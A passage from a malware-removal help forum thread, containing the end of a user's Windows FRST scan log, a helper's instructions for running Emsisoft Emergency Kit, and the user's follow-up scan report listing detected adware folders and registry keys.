2014-09-12 19:00 - 2014-08-18 16:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-09-12 19:00 - 2014-08-18 16:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-09-12 19:00 - 2014-08-18 16:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-09-12 19:00 - 2014-08-18 16:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-09-12 19:00 - 2014-08-18 16:44 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-09-12 19:00 - 2014-08-18 16:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-09-12 19:00 - 2014-08-18 16:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-09-12 19:00 - 2014-08-18 16:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-09-12 19:00 - 2014-08-18 16:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-09-12 19:00 - 2014-08-18 16:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-09-12 19:00 - 2014-08-18 16:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-09-12 19:00 - 2014-08-18 16:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-09-12 19:00 - 2014-08-18 16:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-09-12 19:00 - 2014-08-18 16:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-09-12 19:00 - 2014-08-18 16:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-09-12 19:00 - 2014-08-18 16:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-09-12 19:00 - 2014-08-18 16:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-09-12 19:00 - 2014-08-18 16:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-09-12 19:00 - 2014-08-18 16:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-09-12 19:00 - 2014-08-18 16:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-09-12 19:00 - 2014-08-18 16:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-09-12 19:00 - 2014-08-18 16:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-09-12 19:00 - 2014-08-18 16:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-09-12 19:00 - 2014-08-18 15:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-09-12 19:00 - 2014-08-18 15:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-09-12 19:00 - 2014-08-18 15:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-09-12 18:59 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-09-12 18:14 - 2014-09-12 18:14 - 00000000 ____D () C:\Users\Dale\AppData\Local\Microsoft_Corporation
2014-09-12 03:57 - 2014-07-06 20:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-09-12 03:57 - 2014-07-06 20:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-09-12 03:41 - 2014-08-01 06:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-09-12 00:48 - 2014-09-04 20:52 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-12 00:48 - 2014-09-04 20:47 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-08 09:30 - 2014-09-13 00:13 - 00196608 ____R () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.TLG
2014-09-08 09:30 - 2014-09-13 00:13 - 00000355 _____ () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.ND
2014-09-04 11:33 - 2014-09-12 18:14 - 00000618 _____ () C:\Users\Dale\Desktop\avgrep.txt
2014-09-02 19:12 - 2014-09-02 21:16 - 00181295 _____ () C:\Windows\system32\avgrep.txt
2014-08-28 00:19 - 2014-08-22 20:46 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-28 00:19 - 2014-08-22 19:42 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\ProgramData\Avg_Update_0814tb
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\Program Files\AVG Security Toolbar
2014-08-24 09:47 - 2014-08-24 09:47 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\AVG2014
2014-08-24 09:43 - 2014-09-08 12:49 - 00000895 _____ () C:\Users\Public\Desktop\AVG 2014.lnk
2014-08-24 09:43 - 2014-08-24 09:43 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TuneUp Software
2014-08-24 09:39 - 2014-08-24 09:45 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-24 09:36 - 2014-08-25 00:06 - 00000000 ____D () C:\Users\Dale\AppData\Local\Avg2014
2014-08-24 09:30 - 2014-08-24 09:31 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-08-23 08:14 - 2014-05-14 11:23 - 01973728 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2014-08-23 08:14 - 2014-05-14 11:23 - 00054240 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2014-08-23 08:14 - 2014-05-14 11:23 - 00045536 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2014-08-23 08:14 - 2014-05-14 11:17 - 02425856 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2014-08-23 08:13 - 2014-05-14 11:23 - 00581600 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2014-08-23 08:13 - 2014-05-14 11:23 - 00036320 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2014-08-23 08:13 - 2014-05-14 11:17 - 00092672 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2014-08-22 15:39 - 2014-08-22 15:39 - 00002091 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-08-22 15:39 - 2014-08-22 15:39 - 00002079 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-08-22 15:38 - 2014-09-12 23:23 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2014-08-22 15:38 - 2014-08-22 15:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-08-22 15:38 - 2013-09-20 10:49 - 00018968 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean.exe
2014-08-22 15:33 - 2014-08-22 15:35 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Dale\Downloads\spybot-2.4.exe
2014-08-19 01:09 - 2014-05-14 09:23 - 00179656 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2014-08-19 01:09 - 2014-05-14 09:17 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2014-08-16 18:18 - 2014-06-30 17:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-08-16 18:18 - 2014-06-06 01:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-08-16 18:18 - 2014-03-09 16:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-08-16 18:18 - 2014-03-09 16:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-15 21:00 - 2014-09-13 11:47 - 00014789 _____ () C:\Users\Dale\Desktop\FRST.txt
2014-09-15 20:57 - 2014-09-13 11:47 - 00000000 ____D () C:\FRST
2014-09-15 20:57 - 2009-07-13 23:34 - 00020704 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-15 20:57 - 2009-07-13 23:34 - 00020704 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-15 20:50 - 2013-06-22 11:23 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-15 20:50 - 2012-03-25 21:02 - 00000000 ____D () C:\Program Files\RegZooka
2014-09-15 20:49 - 2014-07-09 18:33 - 00002196 _____ () C:\Windows\setupact.log
2014-09-15 20:49 - 2014-07-09 18:32 - 00029390 _____ () C:\Windows\PFRO.log
2014-09-15 20:49 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-15 20:48 - 2012-07-06 18:03 - 01100404 _____ () C:\Windows\WindowsUpdate.log
2014-09-15 20:44 - 2014-09-15 20:44 - 04968160 _____ (TeamViewer) C:\Users\Dale\Downloads\TeamViewerQS_en-ckj.exe
2014-09-15 19:49 - 2013-06-22 11:23 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-15 17:53 - 2012-03-25 12:25 - 00000000 ____D () C:\ProgramData\MFAData
2014-09-15 07:29 - 2014-09-14 18:13 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TeamViewer
2014-09-14 20:10 - 2014-09-14 20:11 - 04859480 _____ () C:\Users\Dale\Desktop\RogueKiller.exe
2014-09-14 19:42 - 2014-09-14 19:26 - 00047150 _____ () C:\Users\Dale\Desktop\Addition.txt
2014-09-14 18:12 - 2014-09-14 18:12 - 04691456 _____ (TeamViewer) C:\Users\Dale\Downloads\TeamViewerQS_en.exe
2014-09-13 19:23 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-09-13 18:58 - 2014-09-13 18:58 - 00054720 _____ () C:\ComboFix.txt
2014-09-13 18:58 - 2014-09-13 10:19 - 00000000 ____D () C:\Qoobox
2014-09-13 18:53 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-09-13 12:00 - 2014-09-13 12:00 - 02347384 _____ (ESET) C:\Users\Dale\Downloads\esetsmartinstaller_enu.exe
2014-09-13 11:54 - 2014-09-13 11:54 - 00231760 _____ () C:\Users\Dale\Downloads\CrucialScan.exe
2014-09-13 11:42 - 2009-07-13 21:37 - 00000000 __RHD () C:\Users\Default
2014-09-13 11:42 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-09-13 11:38 - 2014-09-13 10:19 - 00000000 ____D () C:\Windows\erdnt
2014-09-13 11:32 - 2012-03-24 10:28 - 00000000 ____D () C:\Users\Dale
2014-09-13 10:41 - 2014-09-13 10:41 - 00000000 ____D () C:\Users\Dale\Documents\ProcAlyzer Dumps
2014-09-13 10:40 - 2012-03-25 13:40 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-09-13 02:20 - 2014-09-13 10:18 - 01097728 _____ (Farbar) C:\Users\Dale\Desktop\FRST.exe
2014-09-13 02:19 - 2014-09-13 10:18 - 05577449 ____R (Swearware) C:\Users\Dale\Desktop\ComboFix.exe
2014-09-13 01:50 - 2014-09-13 01:38 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-13 01:36 - 2012-03-25 14:34 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-13 01:35 - 2012-03-25 14:36 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\Malwarebytes
2014-09-13 01:34 - 2014-09-13 01:34 - 00001020 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-13 01:33 - 2014-09-13 01:33 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Dale\Downloads\mbam-setup-2.0.2.1012.exe
2014-09-13 01:29 - 2012-05-27 19:36 - 00000000 ____D () C:\Windows\pss
2014-09-13 00:33 - 2014-09-13 00:33 - 00007605 _____ () C:\Users\Dale\AppData\Local\Resmon.ResmonCfg
2014-09-13 00:13 - 2014-09-08 09:30 - 00196608 ____R () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.TLG
2014-09-13 00:13 - 2014-09-08 09:30 - 00000355 _____ () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.ND
2014-09-13 00:13 - 2013-06-03 10:04 - 118804480 ____R () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW
2014-09-12 23:36 - 2012-03-24 10:31 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-12 23:23 - 2014-08-22 15:38 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2014-09-12 21:54 - 2009-07-13 21:04 - 00450770 ____R () C:\Windows\system32\Drivers\etc\hosts.20140913-103855.backup
2014-09-12 20:01 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-09-12 19:04 - 2012-03-24 18:52 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-09-12 18:59 - 2013-07-13 18:02 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-12 18:47 - 2012-03-24 19:36 - 98758480 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-09-12 18:46 - 2014-05-06 18:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-09-12 18:14 - 2014-09-12 18:14 - 00000000 ____D () C:\Users\Dale\AppData\Local\Microsoft_Corporation
2014-09-12 18:14 - 2014-09-04 11:33 - 00000618 _____ () C:\Users\Dale\Desktop\avgrep.txt
2014-09-08 12:49 - 2014-08-24 09:43 - 00000895 _____ () C:\Users\Public\Desktop\AVG 2014.lnk
2014-09-08 12:49 - 2013-11-14 09:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-09-08 12:48 - 2012-05-15 08:43 - 00000000 ____D () C:\$AVG
2014-09-04 20:52 - 2014-09-12 00:48 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-04 20:47 - 2014-09-12 00:48 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-03 07:34 - 2012-03-25 21:17 - 00000000 ____D () C:\Windows\options
2014-09-02 21:39 - 2013-07-09 21:46 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-02 21:16 - 2014-09-02 19:12 - 00181295 _____ () C:\Windows\system32\avgrep.txt
2014-09-02 21:05 - 2012-03-24 13:06 - 00000000 ____D () C:\Windows.old
2014-08-28 18:21 - 2009-07-13 23:33 - 00426472 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-26 21:52 - 2012-08-15 07:52 - 01316352 ___SH () C:\Users\Dale\Documents\Thumbs.db
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\ProgramData\Avg_Update_0814tb
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\Program Files\AVG Security Toolbar
2014-08-25 17:36 - 2012-03-25 12:31 - 00000000 ____D () C:\Program Files\AVG Secure Search
2014-08-25 00:06 - 2014-08-24 09:36 - 00000000 ____D () C:\Users\Dale\AppData\Local\Avg2014
2014-08-24 09:47 - 2014-08-24 09:47 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\AVG2014
2014-08-24 09:47 - 2012-03-25 12:28 - 00000000 ____D () C:\Program Files\AVG
2014-08-24 09:45 - 2014-08-24 09:39 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-24 09:43 - 2014-08-24 09:43 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TuneUp Software
2014-08-24 09:31 - 2014-08-24 09:30 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-08-22 20:46 - 2014-08-28 00:19 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-22 19:42 - 2014-08-28 00:19 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-22 15:48 - 2009-07-13 21:04 - 00450770 ____R () C:\Windows\system32\Drivers\etc\hosts.20140912-215418.backup
2014-08-22 15:39 - 2014-08-22 15:39 - 00002091 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-08-22 15:39 - 2014-08-22 15:39 - 00002079 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-08-22 15:39 - 2014-08-22 15:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-08-22 15:37 - 2012-03-25 13:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy
2014-08-22 15:37 - 2012-03-25 13:40 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy
2014-08-22 15:35 - 2014-08-22 15:33 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Dale\Downloads\spybot-2.4.exe
2014-08-20 06:51 - 2013-06-22 11:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2014-08-19 12:39 - 2014-09-12 19:00 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-08-18 17:26 - 2014-09-12 19:00 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-18 17:08 - 2014-09-12 19:00 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-18 16:57 - 2014-09-12 19:00 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-18 16:57 - 2014-09-12 19:00 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-08-18 16:46 - 2014-09-12 19:00 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-18 16:45 - 2014-09-12 19:00 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-08-18 16:44 - 2014-09-12 19:00 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-08-18 16:44 - 2014-09-12 19:00 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-08-18 16:42 - 2014-09-12 19:00 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-18 16:39 - 2014-09-12 19:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-18 16:39 - 2014-09-12 19:00 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-08-18 16:37 - 2014-09-12 19:00 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-18 16:36 - 2014-09-12 19:00 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-18 16:36 - 2014-09-12 19:00 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-08-18 16:35 - 2014-09-12 19:00 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-08-18 16:30 - 2014-09-12 19:00 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-08-18 16:27 - 2014-09-12 19:00 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-18 16:22 - 2014-09-12 19:00 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-08-18 16:19 - 2014-09-12 19:00 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-08-18 16:17 - 2014-09-12 19:00 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-18 16:17 - 2014-09-12 19:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-18 16:15 - 2014-09-12 19:00 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-18 16:09 - 2014-09-12 19:00 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-18 16:08 - 2014-09-12 19:00 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-18 16:08 - 2014-09-12 19:00 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-08-18 16:07 - 2014-09-12 19:00 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-08-18 15:46 - 2014-09-12 19:00 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-18 15:38 - 2014-09-12 19:00 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-18 15:36 - 2014-09-12 19:00 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-08-16 18:52 - 2014-02-09 11:10 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
 
Files to move or delete:
====================
C:\Users\Dale\en_res.dll
C:\Users\Dale\es_res.dll
C:\Users\Dale\fr_res.dll
C:\Users\Dale\grm_res.dll
C:\Users\Dale\it_res.dll
C:\Users\Dale\jp_res.dll
C:\Users\Dale\mfc80u.dll
C:\Users\Dale\msvcr80.dll
C:\Users\Dale\PCPE Setup.exe
C:\Users\Dale\pt_res.dll
C:\Users\Dale\ru_res.dll
C:\Users\Dale\zh_res.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-06 17:15
 
==================== End Of Log ============================


#9 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:01 AM

Posted 16 September 2014 - 06:39 AM

This fixed worked. How is the computer running now?


Download Emsisoft Emergency Kit and save it to your desktop. Double click on EmsisoftEmergencyKit.exe to extract its contents and create a shortcut on the desktop. Leave all settings as they are and click Accept & Extract. A folder named EEK will be created in the root of the drive (usually c:\). .
  • After extraction an Emsisoft Emergency Kit window will open. Under "Run Directly:" click Emergency Kit Scanner.
  • When asked to run an online update, click Yes.
  • When the update is finished, click the Back to Security Status link in the left corner. On the main screen click the Scan Now button.
  • Select the Full Scan option and click the SCAN button.
  • When the scan is finished click the Quarantine selected objects button. Note, this option is only available if malicious objects were detected during the scan.
  • Click the View Report button and in the Reports window double-click on the most recent log. Note, logs are named as follows: a2scan_<date>-<time>.txt.
  • Copy/paste the report contents in your next reply.


#10 mpl006

mpl006
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:08:01 PM

Posted 16 September 2014 - 11:18 AM

The computer is working much better now.  I was worried about it having to restart because the last time it did that the virus came back.  This time it appears as though it is gone.  Here is the log from Emsisoft.  It found 50 issues but all said low risk.

 

Emsisoft Emergency Kit - Version 9.0
Last update: 9/16/2014 7:46:33 AM
User account: Dimension-E510\Dale

Scan settings:

Scan type: Full Scan
Objects: Rootkits, Memory, Traces, C:\, E:\

Detect PUPs: On
Scan archives: On
ADS Scan: On
File extension filter: Off
Advanced caching: On
Direct disk access: Off

Scan start:    9/16/2014 7:47:40 AM
C:\ProgramData\aol toolbar     detected: Application.AppInstall (A)
C:\Users\Dale\AppData\Local\aol toolbar     detected: Application.AppInstall (A)
C:\Program Files\aol toolbar     detected: Application.AppInstall (A)
C:\Program Files\regzooka     detected: Application.AppInstall (A)
C:\Program Files\Common Files\software update utility     detected: Application.InstallUpd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\AXMETASTREAM.METASTREAMCTL     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\AXMETASTREAM.METASTREAMCTL.1     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\AXMETASTREAM.METASTREAMCTLSECONDARY     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\AXMETASTREAM.METASTREAMCTLSECONDARY.1     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{933B95E2-E7B7-4AD9-B952-7AC336682AE3}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{94496571-6AC5-4836-82D5-D46260C44B17}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{B658800C-F66E-4EF3-AB85-6C0C227862A9}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{BC9FD17D-30F6-4464-9E53-596A90AFF023}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{F25AF245-4A81-40DC-92F9-E9021F207706}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATE     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATER.DOWNLOADUIBROWSER     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATER.DOWNLOADUIBROWSER.1     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATER.DOWNLOADUPDCONTROLLER     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATER.DOWNLOADUPDCONTROLLER.1     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INSTALLER\FEATURES\A28B4D68DEBAA244EB686953B7074FEF     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INSTALLER\PRODUCTS\A28B4D68DEBAA244EB686953B7074FEF     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INSTALLER\UPGRADECODES\F928123A039649549966D4C29D35B1C9     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\SCRIPTHELPER.SCRIPTHELPERAPI     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\SCRIPTHELPER.SCRIPTHELPERAPI.1     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{13ABD093-D46F-40DF-A608-47E162EC799D}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{74FB6AFD-DD77-4CEB-83BD-AB2B63E63C93}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{C2AC8A0E-E48E-484B-A71C-C7A937FAAB94}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\VIPROTOCOL.VIPROTOCOLOLE     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\VIPROTOCOL.VIPROTOCOLOLE.1     detected: Application.AdReg (A)
